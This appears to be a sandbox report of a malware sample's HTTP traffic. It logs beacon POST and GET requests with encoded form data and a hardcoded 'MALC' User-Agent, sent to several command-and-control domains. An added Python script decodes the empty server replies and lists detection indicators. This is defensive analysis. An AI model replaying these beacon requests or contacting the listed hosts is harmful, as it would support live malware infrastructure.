                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.drivedoge.website
                                                                    Origin: http://www.drivedoge.website
                                                                    Referer: http://www.drivedoge.website/czka/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Ascii: vxPD=TeWf6fpTkEffkpQ590RmneQFtXEnc6wyo3libZp30z1hUrrbDcAj37uKwt/ikE74/8YWB5NLlfK+hsFErXrVmJfYJN55AMZIfjRiFM1axDWxs3zsGu6i7uDBEwKm37nfX/XPih1pRjpYfwWIUiTaTm/I6dAkv74VfW90ne+vtNEcNqjrrRXS1LSBpqDRL9jAQs7Buc64sdSZR40qgCv5rRj/urgW
Oct 30, 2024 04:56:28.769059896 CET | 778 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49983 | 195.161.68.8 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:56:30.401637077 CET | 1779 | OUT | POST /czka/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.drivedoge.website
                                                                    Origin: http://www.drivedoge.website
                                                                    Referer: http://www.drivedoge.website/czka/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Data Ascii: vxPD= [TRUNCATED]
Oct 30, 2024 04:56:31.351433039 CET | 778 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Error 404. File not found</title></head><body><noscript><h1>Error 404. File not found</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.5 | 49984 | 195.161.68.88 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:32.955595970 CET | 476 | OUT | GET /czka/?vxPD=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.drivedoge.website
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:56:33.889121056 CET | 778 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Error 404. File not found</title></head><body><noscript><h1>Error 404. File not found</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.5 | 49987 | 18.141.10.107 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:39.350809097 CET | 730 | OUT | POST /exug/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.fieldelse.net
                                                                    Origin: http://www.fieldelse.net
                                                                    Referer: http://www.fieldelse.net/exug/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 6e 73 61 55 72 68 47 49 70 57 6f 6f 6d 71 30 41 56 6c 74 52 57 57 70 2f 47 47 78 35 4b 6c 43 58 4b 6d 52 4d 50 34 5a 63 31 6c 55 4a 47 45 55 42 4d 4d 4d 53 44 64 4b 72 53 64 51 63 6e 36 6f 45 30 35 59 43 65 6c 68 47 54 41 76 36 51 62 56 41 4b 4b 79 79 30 56 58 6c 4b 69 49 5a 62 48 77 46 36 6d 56 6f 59 6d 78 6b 41 48 34 6e 41 79 59 49 30 50 4b 55 32 4c 33 54 44 63 69 4d 6b 59 67 65 77 73 52 52 4c 69 68 4b 63 66 67 79 47 58 66 2f 33 6a 6a 55 63 38 48 59 72 4c 59 6c 71 45 72 72 47 6e 67 41 53 72 79 6b 50 68 78 34 43 71 4c 77 44 50 65 6c 47 46 67 66 43 30 3d
                                                                    Data Ascii: vxPD=eWBslyXPujYybnsaUrhGIpWoomq0AVltRWWp/GGx5KlCXKmRMP4Zc1lUJGEUBMMMSDdKrSdQcn6oE05YCelhGTAv6QbVAKKyy0VXlKiIZbHwF6mVoYmxkAH4nAyYI0PKU2L3TDciMkYgewsRRLihKcfgyGXf/3jjUc8HYrLYlqErrGngASrykPhx4CqLwDPelGFgfC0=
                                                                    Oct 30, 2024 04:56:40.787415981 CET | 724 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:40 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=d4858c7a9e6284b60a32b401e222b366|173.254.250.78|1730260600|1730260600|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 14 .. 0 (one 0x14 = 20-byte chunk holding an empty gzip member, then the zero-length last chunk; the decompressed body is empty)


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.5 | 49988 | 18.141.10.107 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:42.058242083 CET | 750 | OUT | POST /exug/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.fieldelse.net
                                                                    Origin: http://www.fieldelse.net
                                                                    Referer: http://www.fieldelse.net/exug/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 48 63 61 53 4d 31 47 4b 4a 57 70 6a 47 71 30 62 46 6c 32 52 57 61 70 2f 43 32 68 35 34 78 43 55 71 57 52 44 75 34 5a 66 31 6c 55 48 6d 45 62 5a 73 4d 62 53 44 41 71 72 54 78 51 63 6e 65 6f 45 31 4a 59 42 74 4e 67 41 44 42 4a 6a 67 62 74 4e 71 4b 79 79 30 56 58 6c 4b 32 6d 5a 62 66 77 47 4b 57 56 75 35 6d 79 70 67 48 37 67 41 79 59 4d 30 50 4f 55 32 4c 42 54 47 38 4d 4d 6d 51 67 65 30 6b 52 51 59 36 69 46 63 65 4b 2f 6d 57 55 78 31 6d 34 4e 74 73 53 64 74 66 62 31 70 30 30 71 77 4b 4b 61 77 6a 61 33 76 4e 4a 6f 52 69 38 68 7a 75 33 2f 6c 56 51 42 56 6a 68 43 71 71 4a 4b 5a 32 75 36 47 57 75 37 6b 32 43 4c 57 37 6c
                                                                    Data Ascii: vxPD=eWBslyXPujYybHcaSM1GKJWpjGq0bFl2RWap/C2h54xCUqWRDu4Zf1lUHmEbZsMbSDAqrTxQcneoE1JYBtNgADBJjgbtNqKyy0VXlK2mZbfwGKWVu5mypgH7gAyYM0POU2LBTG8MMmQge0kRQY6iFceK/mWUx1m4NtsSdtfb1p00qwKKawja3vNJoRi8hzu3/lVQBVjhCqqJKZ2u6GWu7k2CLW7l
                                                                    Oct 30, 2024 04:56:43.473562956 CET | 724 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:43 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=9f5c013b22524f3d6982fc09d6c78c45|173.254.250.78|1730260603|1730260603|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 14 .. 0 (one 0x14 = 20-byte chunk holding an empty gzip member, then the zero-length last chunk; the decompressed body is empty)


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.5 | 49989 | 18.141.10.107 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:44.713918924 CET | 1767 | OUT | POST /exug/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.fieldelse.net
                                                                    Origin: http://www.fieldelse.net
                                                                    Referer: http://www.fieldelse.net/exug/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 48 63 61 53 4d 31 47 4b 4a 57 70 6a 47 71 30 62 46 6c 32 52 57 61 70 2f 43 32 68 35 34 4a 43 55 59 65 52 4d 74 51 5a 65 31 6c 55 59 57 46 63 5a 73 4d 6a 53 44 49 6d 72 54 4e 6d 63 6c 32 6f 46 54 64 59 41 63 4e 67 4f 44 42 4a 2b 51 62 57 41 4b 4b 72 79 77 4a 54 6c 4b 6d 6d 5a 62 66 77 47 4d 61 56 70 6f 6d 79 72 67 48 34 6e 41 79 63 49 30 50 32 55 32 54 2f 54 47 77 79 4d 58 77 67 5a 56 59 52 64 4b 69 69 61 73 65 49 78 47 57 48 78 30 61 64 4e 74 77 65 64 74 43 77 31 70 4d 30 72 30 36 63 44 79 2f 33 32 2b 68 78 34 44 4b 38 39 48 6d 4b 39 45 56 41 4f 46 4c 53 65 36 79 45 4e 64 71 45 34 46 50 66 67 77 4b 4a 42 7a 61 66 6b 74 55 46 2f 58 72 73 62 33 49 75 50 70 64 7a 39 49 54 61 6d 59 77 48 71 48 66 44 44 6b 37 31 51 75 7a 43 6b 51 34 57 63 4f 58 55 42 4f 32 68 71 37 35 4a 5a 6b 33 33 4b 35 35 6b 5a 38 57 65 4e 4d 77 69 44 43 78 6a 58 5a 6d 36 45 30 54 41 35 58 47 54 53 2b 6d 7a 76 2f 50 79 33 62 54 48 41 63 6e 74 59 53 6a 2f 6d 46 6b 33 65 41 75 2b 74 [TRUNCATED]
                                                                    Data Ascii: vxPD=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 [TRUNCATED]
                                                                    Oct 30, 2024 04:56:46.086023092 CET | 724 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:45 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=539711010bd5b06c712e8cd95e404dae|173.254.250.78|1730260605|1730260605|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 14 .. 0 (one 0x14 = 20-byte chunk holding an empty gzip member, then the zero-length last chunk; the decompressed body is empty)


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.5 | 49990 | 18.141.10.107 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:47.395813942 CET | 472 | OUT | GET /exug/?7JH=bvSPlHnHQ4A&vxPD=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.fieldelse.net
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:56:48.754000902 CET | 674 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:48 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=82bcf80ecf5a77f008247d52621d58a6|173.254.250.78|1730260608|1730260608|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0 (only the zero-length last chunk: the body is empty)

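Sessions 5 to 8 above replay the same sequence against www.fieldelse.net that the other hosts receive: three POSTs with bodies of 205, 225 and 1241 bytes, then a GET carrying the same field names in the query string, all with the same hardcoded User-Agent and a single opaque form field. The script below is an added example written for this report; it is not Joe Sandbox output and not code from the sample. It reassembles the chunked, gzip-encoded 200 OK bodies from www.fieldelse.net (the Data Raw hex of sessions 5 to 8, copied from the report) to confirm they decode to nothing, and lists the request traits worth pivoting on in a request copied from session 5. The indicator heuristic, the four-character path pattern and the benign comparison request are my own assumptions, not a vendor signature.

```python
"""Decode the C2 replies and profile the beacon requests seen in the sessions above.

Added example for this report (not Joe Sandbox output and not code from the sample).
The byte strings and the beacon request are copied from the report; the heuristic
in beacon_indicators() and the benign request are my own assumptions.
"""
import gzip
import re
from typing import Dict, List

# Data Raw of the HTTP/1.1 200 OK from www.fieldelse.net in sessions 5-7, copied from the report.
CHUNKED_GZIP_HEX = "31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a"
# Data Raw of the 200 OK in session 8: the terminating chunk only.
EMPTY_CHUNKED_HEX = "30 0d 0a 0d 0a"
# User-Agent carried by every request in this capture; the trailing "MALC" token is not one a browser sends.
BEACON_UA = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)"
# Exactly one form field: a short key and a base64-looking value, nothing else.
SINGLE_FIELD_RE = re.compile(r"^[A-Za-z0-9]{2,6}=[A-Za-z0-9+/]+=*$")


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; chunk extensions and trailers are ignored."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)
        pos = eol + 2
        if size == 0:                   # last-chunk; anything after it is trailer fields
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2                 # step over the chunk data and its CRLF


def decode_response_body(hexdump: str, gzipped: bool) -> bytes:
    """Turn a 'Data Raw' hex dump into the body the client actually received."""
    payload = dechunk(bytes.fromhex(hexdump))
    return gzip.decompress(payload) if gzipped else payload


def parse_request(raw: str) -> dict:
    """Split a request, as printed in the report, into method, target, headers and body."""
    head, _, body = raw.strip().partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def beacon_indicators(req: dict) -> List[str]:
    """List the traits of this capture's beacons that a request shows (heuristic, not a vendor signature)."""
    hits: List[str] = []
    headers = req["headers"]
    path = req["target"].split("?", 1)[0]
    if headers.get("user-agent") == BEACON_UA:
        hits.append("hardcoded User-Agent with MALC token")
    if re.fullmatch(r"/[a-z0-9]{4}/", path):            # /czka/, /exug/, /iv79/ in this capture
        hits.append("four-character directory as the only path element")
    if req["method"] == "POST":
        if headers.get("content-type") == "application/x-www-form-urlencoded" and SINGLE_FIELD_RE.match(req["body"]):
            hits.append("single opaque form field")
        if headers.get("origin") and headers.get("referer") == headers["origin"] + path:
            hits.append("Origin and Referer derived from the target itself")
    return hits


# Request of session 5, copied from the report.
SAMPLE_BEACON = "\n".join([
    "POST /exug/ HTTP/1.1",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding: gzip, deflate, br",
    "Accept-Language: en-US,en;q=0.9",
    "Connection: close",
    "Content-Type: application/x-www-form-urlencoded",
    "Cache-Control: no-cache",
    "Content-Length: 205",
    "Host: www.fieldelse.net",
    "Origin: http://www.fieldelse.net",
    "Referer: http://www.fieldelse.net/exug/",
    "User-Agent: " + BEACON_UA,
    "",
    "vxPD=eWBslyXPujYybnsaUrhGIpWoomq0AVltRWWp/GGx5KlCXKmRMP4Zc1lUJGEUBMMMSDdKrSdQcn6oE05YCelhGTAv6QbVAKKyy0VXlKiIZbHwF6mVoYmxkAH4nAyYI0PKU2L3TDciMkYgewsRRLihKcfgyGXf/3jjUc8HYrLYlqErrGngASrykPhx4CqLwDPelGFgfC0=",
])
# Constructed benign request for comparison (assumption: an ordinary browser fetch, not from the report).
SAMPLE_BENIGN = "\n".join([
    "GET /index.html HTTP/1.1",
    "Host: www.example.com",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36",
    "",
])

if __name__ == "__main__":
    print("fieldelse.net 200 OK body (sessions 5-7):", decode_response_body(CHUNKED_GZIP_HEX, gzipped=True))
    print("fieldelse.net 200 OK body (session 8):", decode_response_body(EMPTY_CHUNKED_HEX, gzipped=False))
    for label, sample in (("session 5 POST", SAMPLE_BEACON), ("benign GET", SAMPLE_BENIGN)):
        print(label, "->", beacon_indicators(parse_request(sample)))
```

Both decoders return an empty body, so within the capture window the server acknowledged the check-ins without returning any tasking; the report does not say which of the contacted hosts is the live C2 and which are decoys, and this script does not try to decide that. The indicator list is meant to seed a detection rule, not to replace one: the MALC User-Agent is the strongest single signal, while the path and form-field patterns only raise confidence when they co-occur with it.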

                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.5 | 49991 | 197.189.237.186 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:54.567487001 CET | 745 | OUT | POST /iv79/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.patioprojex.africa
                                                                    Origin: http://www.patioprojex.africa
                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 34 39 4b 62 72 68 69 7a 33 57 6e 67 42 69 43 35 4a 79 75 37 39 39 50 6f 48 34 69 54 43 2b 57 2b 33 51 61 36 79 6f 73 57 42 52 53 6e 51 4c 31 50 42 73 6a 38 58 58 56 71 6b 53 34 67 54 35 35 61 61 76 37 4e 42 58 71 70 49 7a 68 67 5a 6a 36 36 4f 36 64 55 31 64 7a 58 50 32 45 4e 2b 55 59 32 2b 46 6d 6e 4b 70 34 58 77 6c 68 75 2b 77 6b 73 7a 52 74 59 36 72 6f 33 64 5a 70 59 32 77 47 30 52 4c 76 48 68 7a 34 6b 37 42 61 61 72 73 54 73 71 72 5a 31 53 4f 52 4b 47 35 41 58 43 35 53 79 49 43 65 6a 61 56 2f 4b 63 78 77 77 37 4a 33 75 49 73 37 44 51 6d 66 55 36 6d 34 3d
